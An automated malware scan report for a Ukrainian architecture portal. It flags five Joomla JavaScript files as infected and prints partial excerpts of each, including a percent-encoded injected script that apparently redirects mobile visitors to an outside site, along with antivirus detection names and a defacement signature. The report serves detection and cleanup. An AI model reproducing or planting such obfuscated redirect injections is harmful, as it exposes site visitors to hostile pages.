New scan:

Malware Scanner report for archportal.com.ua

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

!--Hacked by --  (372 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.archportal.com.ua/
200 OK
Content-Length: 41457
Content-Type: text/html
suspicious
Deface/Content modification. The following signature was found: !--Hacked by --

<!--Hacked by -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" >
<head>
<meta name='yandex-verification' content='618b1dbcb516482e' />
<base href="http://www.archportal.com.ua/" />
<meta
...[49607 bytes skipped]...


http://www.archportal.com.ua/components/com_jcomments/js/jcomments-v2.1.js?v=2
200 OK
Content-Length: 31994
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function JCommentsEvents(){}
function JCommentsInput(){}
function JCommentsIndicator(){this.init();}
function JCommentsForm(id,editor){this.init(id,editor);}
function JCommentsEditor(textarea,resizable){this.init(textarea,resizable);}
function JComments(oi,og,r){this.init(oi,og,r);}

JCommentsEvents.prototype = {
add: function(o,e,f){if(o.addEventListener){o.addEventListener(e,f,false);return true;}else if(o.attachEvent){var r=o.attachEvent("on"+e,f);retu
... 3132 bytes are skipped ...
1%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Ikarus
Trojan.JS.Redirector
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.189
Kaspersky
Trojan-Downloader.JS.JScript.cb
Fortinet
JS/Redirector.LLX!tr
NANO-Antivirus
Trojan.Url.IframeB.bmpqel
AVG
HTML/Framer
Norman
Redirector.JB
GData
JS:Redirector-AKA
ESET-NOD32
JS/Redirector.NJG

http://www.archportal.com.ua/components/com_jcomments/libraries/joomlatune/ajax.js
200 OK
Content-Length: 8793
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if (!window.jtajax) {
function jtAJAX()
{
this.options = {url: '',type: 'post',nocache: true,data: ''};
this.$ = function(id) {if(!id){return null;}var o=document.getElementById(id);if(!o&&document.all){o=document.all[id];}return o;};
this.extend = function(o, e){for(var k in (e||{}))o[k]=e[k];return o;};
this.encode = function(t){return encodeURIComponent(t);};
this.setup = function(options) {this.options = this.extend(this.options, options);};
this
... 3276 bytes are skipped ...
1%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

Antivirus reports:

Comodo
TrojWare.JS.Agent.TC

http://www.archportal.com.ua/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/javascript
clean
http://www.archportal.com.ua/includes/js/overlib_mini.js
200 OK
Content-Length: 41645
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var olLoaded=0,pmStart=10000000,pmUpper=10001000,pmCount=pmStart+1,pmt='',pms=new Array(),olInfo=new Info('4.21',1),FREPLACE=0,FBEFORE=1,FAFTER=2,FALTERNATE=3,FCHAIN=4,olHideForm=0,olHautoFlag=0,olVautoFlag=0,hookPts=new Array(),postParse=new Array(),cmdLine=new Array(),runTime=new Array();
registerCommands('donothing,inarray,caparray,sticky,background,noclose,caption,left,right,center,offsetx,offsety,fgcolor,bgcolor,textcolor,capcolor,closecolor,width,border,cellpad,status,autostatus,autost
... 3008 bytes are skipped ...
1%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

Antivirus reports:

Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.192
AVG
HTML/Framer

http://www.archportal.com.ua/components/com_joomgallery/assets/js/joomscript.js
200 OK
Content-Length: 20005
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function joom_getcoordinates(){
document.nameshieldform.xvalue.value=document.getElementById("u1").offsetTop;
document.nameshieldform.yvalue.value=document.getElementById("u1").offsetLeft;
document.nameshieldform.submit();
}
function joom_validatecomment(){
if (document.commentform.cmttext.value==''){
alert(joomgallery_enter_comment);
} else if(jg_use_code==1) {
if (document.commentform.jgcode != null && document.commentform.jg_code
... 3220 bytes are skipped ...
1%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.189
Kaspersky
Trojan-Downloader.JS.JScript.cb
Fortinet
JS/Redirector.LLX!tr
NANO-Antivirus
Trojan.Url.IframeB.bmpqel
AVG
HTML/Framer
Norman
Redirector.JB
GData
JS:Redirector-AKA
ESET-NOD32
JS/Redirector.NJG

http://archportal.com.ua/plugins/system/pc_includes/ajax_1.3.js
200 OK
Content-Length: 13854
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)


function Jax()
{var loadingTimeout=400;var iframe;this.loadingFunction=function(){};this.doneLoadingFunction=function(){};this.stringify=function(arg){var c,i,l,o,u,v;switch(typeof arg){case'object':if(arg){if(arg.constructor==Array){o='';for(i=0;i<arg.length;++i){v=this.stringify(arg[i]);if(o&&(v!==u)){o+=',';}
if(v!==u){o+=v;}}
return'['+o+']';}else if(typeof arg.toString!='undefined'){o='';for(i in arg){v=this.stringify(arg[i]);if(v!==u){if(o){o+=',';}
o+=
... 3108 bytes are skipped ...
1%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Ikarus
Trojan.JS.Redirector
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.189
Kaspersky
Trojan-Downloader.JS.JScript.cb
Fortinet
JS/Redirector.LLX!tr
NANO-Antivirus
Trojan.Url.IframeB.bmpqel
AVG
HTML/Framer
Norman
Redirector.JB
GData
JS:Redirector-AKA
ESET-NOD32
JS/Redirector.NJG

http://counter.rambler.ru/top100.jcn?1963234
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://www.archportal.com.ua/home/aboutportal
404 Not Found
Content-Length: 333
Content-Type: text/html
clean
http://www.archportal.com.ua/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean
http://www.archportal.com.ua/contacts/Авторы-сайта/
404 Not Found
Content-Length: 350
Content-Type: text/html
clean
http://www.archportal.com.ua/home/for-reclame
404 Not Found
Content-Length: 333
Content-Type: text/html
clean
http://www.archportal.com.ua/events/
404 Not Found
Content-Length: 324
Content-Type: text/html
clean
http://www.archportal.com.ua/events/architectural-contests/
404 Not Found
Content-Length: 347
Content-Type: text/html
clean
http://www.archportal.com.ua/events/q-950600q
404 Not Found
Content-Length: 333
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: archportal.com.ua

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: archportal.com.ua
Referer: http://www.google.com/search?q=archportal.com.ua

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=archportal.com.ua

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://archportal.com.ua/

Result: archportal.com.ua is not infected or malware details are not published yet.